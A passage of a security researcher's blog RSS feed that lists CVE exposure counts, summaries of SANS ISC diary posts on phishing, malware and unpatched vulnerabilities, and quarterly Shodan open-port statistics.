        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;7.5&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2019-9641&#34;&gt;CVE-2019-9641&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,149,029&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;9.8&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2019-9639&#34;&gt;CVE-2019-9639&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,149,025&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;7.5&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2019-9638&#34;&gt;CVE-2019-9638&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,149,024&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;7.5&lt;/td&gt;
    &lt;/tr&gt;
    &lt;tr&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;&lt;a href=&#34;https://nvd.nist.gov/vuln/detail/CVE-2019-9637&#34;&gt;CVE-2019-9637&lt;/a&gt;&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;4,149,015&lt;/td&gt;
        &lt;td style=&#34;text-align:center;padding:5px&#34;&gt;7.5&lt;/td&gt;
    &lt;/tr&gt;    
&lt;/table&gt;
&lt;br&gt;
&lt;p&gt;As we see, the vulnerabilities we discussed in the &lt;a href=&#34;https://isc.sans.edu/diary/26798&#34;&gt;ISC post&lt;/a&gt; may all have high impact, but would seem not to be the most common ones.&lt;/p&gt;
&lt;p&gt;Although it’s not too probable, let’s hope that the number of systems affected by the CVEs mentioned above start falling soon, as otherwise they might quite quickly become dangerous not just for their users but to others as well, since public exploits for some of the vulnerabilities are freely available…&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/2020/13-shodan_vulns/top15.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Vulnerabilities don’t disappear just because we don’t talk about them anymore</title>
        <link>https://untrustednetwork.net/en/2020/11/16/sans-isc-diary-vulnerabilities-dont-disappear-just-because-we-dont-talk-about-them-anymore/</link>
        <pubDate>Mon, 16 Nov 2020 11:08:20 +0200</pubDate>
        
        <atom:modified>Mon, 16 Nov 2020 11:08:20 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/11/16/sans-isc-diary-vulnerabilities-dont-disappear-just-because-we-dont-talk-about-them-anymore/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at couple of pre-2020 high-impact vulnerabilities, which still affect surprising number of publicly accessible systems.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Heartbleed+BlueKeep+and+other+vulnerabilities+that+didnt+disappear+just+because+we+dont+talk+about+them+anymore/26798/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at couple of pre-2020 high-impact vulnerabilities, which still affect surprising number of publicly accessible systems.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>BlueKeep</category>
            
          
            
              <category>HeartBleed</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - SMBGhost - the critical vulnerability many seem to have forgotten to patch</title>
        <link>https://untrustednetwork.net/en/2020/10/28/sans-isc-diary-smbghost-the-critical-vulnerability-many-seem-to-have-forgotten-to-patch/</link>
        <pubDate>Wed, 28 Oct 2020 11:00:00 +0200</pubDate>
        
        <atom:modified>Wed, 28 Oct 2020 11:00:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/10/28/sans-isc-diary-smbghost-the-critical-vulnerability-many-seem-to-have-forgotten-to-patch/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at the concerning number of machines connected to the internet, that are still not patched for the critical SMBGhost vulnerability.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/SMBGhost+the+critical+vulnerability+many+seem+to+have+forgotten+to+patch/26732/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at the concerning number of machines connected to the internet, that are still not patched for the critical SMBGhost vulnerability.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>SMBGhost</category>
            
          
            
              <category>Windows</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - BazarLoader phishing lures: plan a Halloween party, get a bonus and be fired in the same afternoon</title>
        <link>https://untrustednetwork.net/en/2020/10/22/sans-isc-diary-bazarloader-phishing-lures-plan-a-halloween-party-get-a-bonus-and-be-fired-in-the-same-afternoon/</link>
        <pubDate>Thu, 22 Oct 2020 11:00:00 +0200</pubDate>
        
        <atom:modified>Thu, 22 Oct 2020 11:00:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/10/22/sans-isc-diary-bazarloader-phishing-lures-plan-a-halloween-party-get-a-bonus-and-be-fired-in-the-same-afternoon/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at phishing campaigns spreading BazarLoader malware and the lures which they use.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/BazarLoader+phishing+lures+plan+a+Halloween+party+get+a+bonus+and+be+fired+in+the+same+afternoon/26710/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at phishing campaigns spreading BazarLoader malware and the lures which they use.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>BazarLoader</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing kits as far as the eye can see</title>
        <link>https://untrustednetwork.net/en/2020/10/09/sans-isc-diary-phishing-kits-as-far-as-the-eye-can-see/</link>
        <pubDate>Fri, 09 Oct 2020 07:40:00 +0200</pubDate>
        
        <atom:modified>Fri, 09 Oct 2020 07:40:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/10/09/sans-isc-diary-phishing-kits-as-far-as-the-eye-can-see/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at phishing kits, which are offered on the indexed part of the web.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Phishing+kits+as+far+as+the+eye+can+see/26660/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at phishing kits, which are offered on the indexed part of the web.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Phishing kit</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Open ports statistics for Q3 2020</title>
        <link>https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/</link>
        <pubDate>Wed, 30 Sep 2020 07:30:00 +0200</pubDate>
        
        <atom:modified>Wed, 30 Sep 2020 07:30:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/</guid>
        <description>If you&amp;rsquo;ve read any of my posts about open ports on public IP addresses either here or on the SANS Internet Storm Center website, you probably know that I&amp;rsquo;m interested in how the internet changes over time and I try to gain at least some understanding of it by analyzing data gathered over time from Shodan.
To this end, I&amp;rsquo;ve been gathering daily statistics of different open ports/running services accessible on public IP addresses around the world and in different countries for about 18 months now.</description>
        <content:encoded>&lt;p&gt;If you&amp;rsquo;ve read any of my posts about open ports on public IP addresses either here or on the &lt;a href=&#34;https://isc.sans.edu/handler_list.html?author=1016653899&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website, you probably know that I&amp;rsquo;m interested in how the internet changes over time and I try to gain at least some understanding of it by analyzing data gathered over time from &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To this end, I&amp;rsquo;ve been gathering daily statistics of different open ports/running services accessible on public IP addresses around the world and in different countries for about 18 months now. In order to acquire this data, I wrote Python tool (which I&amp;rsquo;ve called &amp;ldquo;TriOp&amp;rdquo; for obvious reasons), that enables me to quickly create reusable batches of queries for Shodan and automatically gather the numbers of IP addresses, which satisfy these queries. I plan to open source the tool in the future, but I will first need to find some time to clean up the code a little, as although it works just fine in its current version, it is a bit too spaghetti-like in some places for my liking&amp;hellip;&lt;/p&gt;
&lt;p&gt;In any case, since I have access to this data and I&amp;rsquo;m probably not the only one who finds the changes in numbers of different open ports interesting, I&amp;rsquo;ve decided to start publishing quarterly (and perhaps yearly) charts of the numbers of IPs, which have some of the more interesting ports open to the internet.&lt;br /&gt;
The list of ports is intentionally small, but if you&amp;rsquo;d like to see a chart for any of the missing ones next quarter, let me know and I&amp;rsquo;ll consider adding it.&lt;/p&gt;
&lt;p&gt;I should mention that due to the way Shodan works, the numbers gathered from it may sometimes increase or decrease sharply and take a while to stabilize (see the first week of September in any of the charts bellow), which does not necessarily represent the real state of affairs. Short discussion of this issue may be found &lt;a href=&#34;https://isc.sans.edu/forums/diary/Did+the+recent+malicious+BlueKeep+campaign+have+any+positive+impact+when+it+comes+to+patching/25506/&#34;&gt;here&lt;/a&gt;. To alleviate this issue to at least some degree, I&amp;rsquo;ve included relative (i.e. percentage of IPs Shodan sees, which have a specific port open) as well as absolute values in all the charts.&lt;/p&gt;
&lt;p&gt;Given the limitations of Shodan and the fact that (except for ICS data) the values in the charts are gathered using only port queries (i.e. &amp;ldquo;port:80&amp;rdquo;) and are not limited by any service specification, they may be slightly imprecise. Still, the results are certainly interesting and provide at least somewhat accurate look at how the internet changes over time.&lt;/p&gt;
&lt;p&gt;Bellow, you may find charts for the following protocols and ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ssh&#34;&gt;SSH (port 22)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#telnet&#34;&gt;Telnet (port 23)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#dns&#34;&gt;DNS (port 53)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ntp&#34;&gt;NTP (port 123)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#snmp&#34;&gt;SNMP (port 161)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smb&#34;&gt;SMB (port 445)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#rdp&#34;&gt;RDP (port 3389)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;web&#34;&gt;Web&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#web&#34;&gt;HTTP (port 80)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#https&#34;&gt;HTTPS (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;e-mail&#34;&gt;E-mail&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#smtp&#34;&gt;SMTP (port 25)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smtps&#34;&gt;SMTPS (port 465)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imap&#34;&gt;IMAP (port 143)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imaps&#34;&gt;IMAPS (port 993)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3&#34;&gt;POP3 (port 110)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3s&#34;&gt;POP3S (port 995)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;industrial-control-systems-ics&#34;&gt;Industrial Control Systems (ICS)&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#modbus&#34;&gt;Modbus (port 502)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#bacnet&#34;&gt;BACnet/IP (port 47808)&lt;br /&gt;
&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h4 id=&#34;ssh&#34;&gt;SSH (port 22)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/ssh.png&#34; alt=&#34;SSH&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;telnet&#34;&gt;Telnet (port 23)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/telnet.png&#34; alt=&#34;Telnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;dns&#34;&gt;DNS (port 53)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/dns.png&#34; alt=&#34;DNS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ntp&#34;&gt;NTP (port 123)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/ntp.png&#34; alt=&#34;NTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;snmp&#34;&gt;SNMP (port 161)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/snmp.png&#34; alt=&#34;SNMP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smb&#34;&gt;SMB (port 445)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/smb.png&#34; alt=&#34;SMB&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;rdp&#34;&gt;RDP (port 3389)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/rdp.png&#34; alt=&#34;RDP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;http&#34;&gt;HTTP (port 80)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/http.png&#34; alt=&#34;HTTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;https&#34;&gt;HTTPS (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/https.png&#34; alt=&#34;HTTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtp&#34;&gt;SMTP (port 25)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/smtp.png&#34; alt=&#34;SMTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtps&#34;&gt;SMTPS (port 465)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/smtps.png&#34; alt=&#34;SMTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imap&#34;&gt;IMAP (port 143)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/imap.png&#34; alt=&#34;IMAP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imaps&#34;&gt;IMAPS (port 993)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/imaps.png&#34; alt=&#34;IMAPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3&#34;&gt;POP3 (port 110)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/pop3.png&#34; alt=&#34;POP3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3s&#34;&gt;POP3S (port 995)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/pop3s.png&#34; alt=&#34;POP3S&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;modbus&#34;&gt;Modbus (port 502)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/modbus.png&#34; alt=&#34;Modbus&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/eibnet.png&#34; alt=&#34;EIBnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;bacnet&#34;&gt;BACnet/IP (port 47808)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2020/q3/bacnet.png&#34; alt=&#34;BACnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/stats.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>DNS</category>
            
          
            
              <category>NTP</category>
            
          
            
              <category>SNMP</category>
            
          
            
              <category>SMB</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>SMTPS</category>
            
          
            
              <category>IMAP</category>
            
          
            
              <category>IMAPS</category>
            
          
            
              <category>POP3</category>
            
          
            
              <category>POP3S</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>EIBnet</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>Open port statistics</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Slightly broken overlay phishing</title>
        <link>https://untrustednetwork.net/en/2020/09/21/sans-isc-diary-slightly-broken-overlay-phishing/</link>
        <pubDate>Mon, 21 Sep 2020 12:50:00 +0200</pubDate>
        
        <atom:modified>Mon, 21 Sep 2020 12:50:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/09/21/sans-isc-diary-slightly-broken-overlay-phishing/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at an interesting (and slightly broken) phishing campaign, which overlays legitimate pages with fake login prompts.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Slightly+broken+overlay+phishing/26586/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at an interesting (and slightly broken) phishing campaign, which overlays legitimate pages with fake login prompts.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - A blast from the past - XXEncoded VB6.0 Trojan</title>
        <link>https://untrustednetwork.net/en/2020/09/04/sans-isc-diary-a-blast-from-the-past-xxencoded-vb6.0-trojan/</link>
        <pubDate>Fri, 04 Sep 2020 09:35:00 +0200</pubDate>
        
        <atom:modified>Fri, 04 Sep 2020 09:35:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/09/04/sans-isc-diary-a-blast-from-the-past-xxencoded-vb6.0-trojan/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a campaign in which the malicious actors decided to go reall &amp;ldquo;old school&amp;rdquo; when it comes to file formats they would use.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/A+blast+from+the+past+XXEncoded+VB60+Trojan/26538/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a campaign in which the malicious actors decided to go reall &amp;ldquo;old school&amp;rdquo; when it comes to file formats they would use.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Security.txt - one small file for an admin, one giant help to a security researcher</title>
        <link>https://untrustednetwork.net/en/2020/08/27/sans-isc-diary-security.txt-one-small-file-for-an-admin-one-giant-help-to-a-security-researcher/</link>
        <pubDate>Thu, 27 Aug 2020 09:20:00 +0200</pubDate>
        
        <atom:modified>Thu, 27 Aug 2020 09:20:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/08/27/sans-isc-diary-security.txt-one-small-file-for-an-admin-one-giant-help-to-a-security-researcher/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at the draft standard for &amp;ldquo;A File Format to Aid in Security Vulnerability Disclosure&amp;rdquo;, better known as security.txt.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Securitytxt+one+small+file+for+an+admin+one+giant+help+to+a+security+researcher/26510/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at the draft standard for &amp;ldquo;A File Format to Aid in Security Vulnerability Disclosure&amp;rdquo;, better known as security.txt.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Definition of &#39;overkill&#39; - using 130 MB executable to hide 24 kB malware</title>
        <link>https://untrustednetwork.net/en/2020/08/14/sans-isc-diary-definition-of-overkill-using-130-mb-executable-to-hide-24-kb-malware/</link>
        <pubDate>Fri, 14 Aug 2020 14:20:00 +0200</pubDate>
        
        <atom:modified>Fri, 14 Aug 2020 14:20:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/08/14/sans-isc-diary-definition-of-overkill-using-130-mb-executable-to-hide-24-kb-malware/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a 130 MB EXE carrying within it a 24 kB malicious payload.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Definition+of+overkill+using+130+MB+executable+to+hide+24+kB+malware/26464/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a 130 MB EXE carrying within it a 24 kB malicious payload.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Trojan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - What pages do bad bots look for?</title>
        <link>https://untrustednetwork.net/en/2020/08/01/sans-isc-diary-what-pages-do-bad-bots-look-for/</link>
        <pubDate>Sat, 01 Aug 2020 16:15:00 +0200</pubDate>
        
        <atom:modified>Sat, 01 Aug 2020 16:15:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/08/01/sans-isc-diary-what-pages-do-bad-bots-look-for/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at which interesting pages &amp;ldquo;bad&amp;rdquo; bots look for the most on web servers.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/What+pages+do+bad+bots+look+for/26414/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at which interesting pages &amp;ldquo;bad&amp;rdquo; bots look for the most on web servers.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Bots</category>
            
          
            
              <category>HTTP</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Couple of interesting Covid-19 related stats</title>
        <link>https://untrustednetwork.net/en/2020/07/21/sans-isc-diary-couple-of-interesting-covid-19-related-stats/</link>
        <pubDate>Tue, 21 Jul 2020 10:55:00 +0200</pubDate>
        
        <atom:modified>Tue, 21 Jul 2020 10:55:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/07/21/sans-isc-diary-couple-of-interesting-covid-19-related-stats/</guid>
